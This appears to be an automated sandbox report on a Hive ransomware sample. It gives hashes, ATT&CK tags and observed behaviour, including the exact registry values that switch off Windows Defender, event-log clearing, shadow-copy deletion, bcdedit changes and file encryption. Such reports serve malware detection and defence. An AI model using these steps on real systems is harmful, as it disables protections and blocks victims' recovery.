3858e95bcf18c692f8321e3f8380c39684edb90bb622f37911144950602cea21

Analysis

max time kernel
34s
max time network
20s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
19/02/2024, 16:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
Size

3.3MB
MD5

5384c6825a5707241c11d78529dbbfee
SHA1

85f5587e8ad534c2e5de0e72450b61ebda93e4fd
SHA256

3858e95bcf18c692f8321e3f8380c39684edb90bb622f37911144950602cea21
SHA512

856861295efb9c1b0000b369297cf6905a277c2d7dd0bc238f3884cd22598055450bf0459d68441f135bb77150685a86707ea9320a37e10548b40185f09b961f
SSDEEP

49152:HJ9mQ5uetkErb/TKvO90dL3BmAFd4A64nsfJ+9NRUMZXuPH9fc0KHPKG/g+eNgiz:HJ9jkl9NbBo9fc0KHYno

Score

10^/10

evasion ransomware spyware stealer trojan

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
2520	MpCmdRun.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

Clears Windows event logs 1 TTPs 3 IoCs

evasion ransomware

Indicator Removal

T1070

pid	Process
1200	wevtutil.exe
1648	wevtutil.exe
1916	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2220	bcdedit.exe
2744	bcdedit.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\tipresx.dll.mui	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-foreground.png	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-5.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_L8HvB0zElm40.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Paris.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_zFioPbdZ7H40.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.properties.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_ndAmZIowWxg0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_99XH01iNsYY0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_cQ21COJbbuc0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_VdigUcgB53s0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jre7\Welcome.html.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_Wi-8vHQ-d4U0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Toronto.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_ieN6l91D1Uc0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_ukaNUPftsDU0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Common Files\System\it-IT\wab32res.dll.mui	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\en-US\boxed-delete.avi	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_MKKB8owpW9A0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861240811.profile.gz.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_nh7F-Gld3fU0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_GEueefA0Z600.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\SystemV\PST8.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_2G4EGhLqjPI0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\it-IT\SpiderSolitaire.exe.mui.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_bXjJte2htms0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Helsinki.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_q6nvK0r_OTs0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_9t7kpk2VE-M0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hwrfrash.dat	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_MATTE2_PAL.wmv	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belize.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_q1V9ftuOCdM0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_i4FfbsQxtGE0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\TravelIntroToMain.wmv	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_ja.jar.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_3U9oh_NxnAM0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Detroit.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_RWUhFBqJ8O80.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\ReceiveRestore.reg.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_o6tWHoyxBrM0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\1047x576_91n92.png	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\PassportMask.wmv	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp_5.5.0.165303.jar.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_SvFr2X3YHAk0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt_1.1.1.v20140903-0821.jar.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_qCIXmJpkgqI0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_eCNkzXDjU940.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveDrop32x32.gif.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_XJzHBYwlkKI0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\da-DK\tipresx.dll.mui	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Nome.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_9apvydTclyw0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\vignettemask25.png	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-search.xml.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_YO_jTjQY9Bk0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-visual.jar.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_0co6VSpkSwI0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Luxembourg.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_DahrAD8oNNo0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Windows Media Player\ja-JP\WMPSideShowGadget.exe.mui	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\mip.exe.mui	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_Yh8MUbebUzs0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.runtime_3.10.0.v20140318-2214.jar.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_URXng2fREMs0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-multitabs.xml.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_9mid8wOsi4g0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Port-au-Prince.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_ffQS_AI05NA0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ku.txt.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_wiH-BGiNEVQ0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Notes_loop.wmv	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh89.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_PY8eJiMhfXM0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_HZ--ZVcT1jg0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Africa\Cairo.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_iQbJluJ_SI80.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bg.txt.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_NrBzdm_ZPVg0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_ja_4.4.0.v20140623020002.jar.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_GocNeSdMPus0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jre7\lib\amd64\jvm.cfg.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_YSUL5sAByMk0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jre7\lib\plugin.jar.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_aI5tKVfSHz00.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Dushanbe.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_0bKB15pHNTo0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\tipresx.dll.mui	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\zh-CN\tipresx.dll.mui	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Maceio.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_sjIRg4Tzl-80.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Hobart.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_hSDI4d7AZkQ0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.inject_1.0.0.v20091030.jar.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_wy-pT3MY2Bc0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Spades\de-DE\ShvlRes.dll.mui.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_Do59PsXDTMU0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\vlc.mo.zBDqXH5rTvrKyuC3vj1ajWW0_OboswHD_FDq4Q25QIn_yb0SxGK3sRU0.2o4xo	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
668	sc.exe
436	sc.exe
568	sc.exe
2608	sc.exe
2688	sc.exe
1168	sc.exe
1960	sc.exe
1080	sc.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
1384	vssadmin.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2392	powershell.exe
2876	powershell.exe
2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	1200	wevtutil.exe
Token: SeBackupPrivilege	1200	wevtutil.exe
Token: SeSecurityPrivilege	1648	wevtutil.exe
Token: SeBackupPrivilege	1648	wevtutil.exe
Token: SeSecurityPrivilege	1916	wevtutil.exe
Token: SeBackupPrivilege	1916	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	2864	wmic.exe
Token: SeSecurityPrivilege	2864	wmic.exe
Token: SeTakeOwnershipPrivilege	2864	wmic.exe
Token: SeLoadDriverPrivilege	2864	wmic.exe
Token: SeSystemProfilePrivilege	2864	wmic.exe
Token: SeSystemtimePrivilege	2864	wmic.exe
Token: SeProfSingleProcessPrivilege	2864	wmic.exe
Token: SeIncBasePriorityPrivilege	2864	wmic.exe
Token: SeCreatePagefilePrivilege	2864	wmic.exe
Token: SeBackupPrivilege	2864	wmic.exe
Token: SeRestorePrivilege	2864	wmic.exe
Token: SeShutdownPrivilege	2864	wmic.exe
Token: SeDebugPrivilege	2864	wmic.exe
Token: SeSystemEnvironmentPrivilege	2864	wmic.exe
Token: SeRemoteShutdownPrivilege	2864	wmic.exe
Token: SeUndockPrivilege	2864	wmic.exe
Token: SeManageVolumePrivilege	2864	wmic.exe
Token: 33	2864	wmic.exe
Token: 34	2864	wmic.exe
Token: 35	2864	wmic.exe
Token: SeIncreaseQuotaPrivilege	1944	wmic.exe
Token: SeSecurityPrivilege	1944	wmic.exe
Token: SeTakeOwnershipPrivilege	1944	wmic.exe
Token: SeLoadDriverPrivilege	1944	wmic.exe
Token: SeSystemProfilePrivilege	1944	wmic.exe
Token: SeSystemtimePrivilege	1944	wmic.exe
Token: SeProfSingleProcessPrivilege	1944	wmic.exe
Token: SeIncBasePriorityPrivilege	1944	wmic.exe
Token: SeCreatePagefilePrivilege	1944	wmic.exe
Token: SeBackupPrivilege	1944	wmic.exe
Token: SeRestorePrivilege	1944	wmic.exe
Token: SeShutdownPrivilege	1944	wmic.exe
Token: SeDebugPrivilege	1944	wmic.exe
Token: SeSystemEnvironmentPrivilege	1944	wmic.exe
Token: SeRemoteShutdownPrivilege	1944	wmic.exe
Token: SeUndockPrivilege	1944	wmic.exe
Token: SeManageVolumePrivilege	1944	wmic.exe
Token: 33	1944	wmic.exe
Token: 34	1944	wmic.exe
Token: 35	1944	wmic.exe
Token: SeIncreaseQuotaPrivilege	1944	wmic.exe
Token: SeSecurityPrivilege	1944	wmic.exe
Token: SeTakeOwnershipPrivilege	1944	wmic.exe
Token: SeLoadDriverPrivilege	1944	wmic.exe
Token: SeSystemProfilePrivilege	1944	wmic.exe
Token: SeSystemtimePrivilege	1944	wmic.exe
Token: SeProfSingleProcessPrivilege	1944	wmic.exe
Token: SeIncBasePriorityPrivilege	1944	wmic.exe
Token: SeCreatePagefilePrivilege	1944	wmic.exe
Token: SeBackupPrivilege	1944	wmic.exe
Token: SeRestorePrivilege	1944	wmic.exe
Token: SeShutdownPrivilege	1944	wmic.exe
Token: SeDebugPrivilege	1944	wmic.exe
Token: SeSystemEnvironmentPrivilege	1944	wmic.exe
Token: SeRemoteShutdownPrivilege	1944	wmic.exe
Token: SeUndockPrivilege	1944	wmic.exe
Token: SeManageVolumePrivilege	1944	wmic.exe
Token: 33	1944	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2404 wrote to memory of 2660	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	29
PID 2404 wrote to memory of 2660	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	29
PID 2404 wrote to memory of 2660	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	29
PID 2660 wrote to memory of 2308	2660	net.exe	31
PID 2660 wrote to memory of 2308	2660	net.exe	31
PID 2660 wrote to memory of 2308	2660	net.exe	31
PID 2404 wrote to memory of 2808	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	32
PID 2404 wrote to memory of 2808	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	32
PID 2404 wrote to memory of 2808	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	32
PID 2808 wrote to memory of 2764	2808	net.exe	34
PID 2808 wrote to memory of 2764	2808	net.exe	34
PID 2808 wrote to memory of 2764	2808	net.exe	34
PID 2404 wrote to memory of 2724	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	35
PID 2404 wrote to memory of 2724	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	35
PID 2404 wrote to memory of 2724	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	35
PID 2724 wrote to memory of 2796	2724	net.exe	37
PID 2724 wrote to memory of 2796	2724	net.exe	37
PID 2724 wrote to memory of 2796	2724	net.exe	37
PID 2404 wrote to memory of 2816	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	38
PID 2404 wrote to memory of 2816	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	38
PID 2404 wrote to memory of 2816	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	38
PID 2816 wrote to memory of 3036	2816	net.exe	40
PID 2816 wrote to memory of 3036	2816	net.exe	40
PID 2816 wrote to memory of 3036	2816	net.exe	40
PID 2404 wrote to memory of 2684	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	41
PID 2404 wrote to memory of 2684	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	41
PID 2404 wrote to memory of 2684	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	41
PID 2684 wrote to memory of 2868	2684	net.exe	43
PID 2684 wrote to memory of 2868	2684	net.exe	43
PID 2684 wrote to memory of 2868	2684	net.exe	43
PID 2404 wrote to memory of 2128	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	44
PID 2404 wrote to memory of 2128	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	44
PID 2404 wrote to memory of 2128	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	44
PID 2128 wrote to memory of 2704	2128	net.exe	46
PID 2128 wrote to memory of 2704	2128	net.exe	46
PID 2128 wrote to memory of 2704	2128	net.exe	46
PID 2404 wrote to memory of 2732	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	47
PID 2404 wrote to memory of 2732	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	47
PID 2404 wrote to memory of 2732	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	47
PID 2732 wrote to memory of 2620	2732	net.exe	49
PID 2732 wrote to memory of 2620	2732	net.exe	49
PID 2732 wrote to memory of 2620	2732	net.exe	49
PID 2404 wrote to memory of 2740	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	50
PID 2404 wrote to memory of 2740	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	50
PID 2404 wrote to memory of 2740	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	50
PID 2740 wrote to memory of 2580	2740	net.exe	52
PID 2740 wrote to memory of 2580	2740	net.exe	52
PID 2740 wrote to memory of 2580	2740	net.exe	52
PID 2404 wrote to memory of 2608	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	53
PID 2404 wrote to memory of 2608	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	53
PID 2404 wrote to memory of 2608	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	53
PID 2404 wrote to memory of 2688	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	55
PID 2404 wrote to memory of 2688	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	55
PID 2404 wrote to memory of 2688	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	55
PID 2404 wrote to memory of 1168	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	57
PID 2404 wrote to memory of 1168	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	57
PID 2404 wrote to memory of 1168	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	57
PID 2404 wrote to memory of 1960	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	59
PID 2404 wrote to memory of 1960	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	59
PID 2404 wrote to memory of 1960	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	59
PID 2404 wrote to memory of 1080	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	61
PID 2404 wrote to memory of 1080	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	61
PID 2404 wrote to memory of 1080	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	61
PID 2404 wrote to memory of 668	2404	2024-02-19_5384c6825a5707241c11d78529dbbfee_hive.exe	63

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
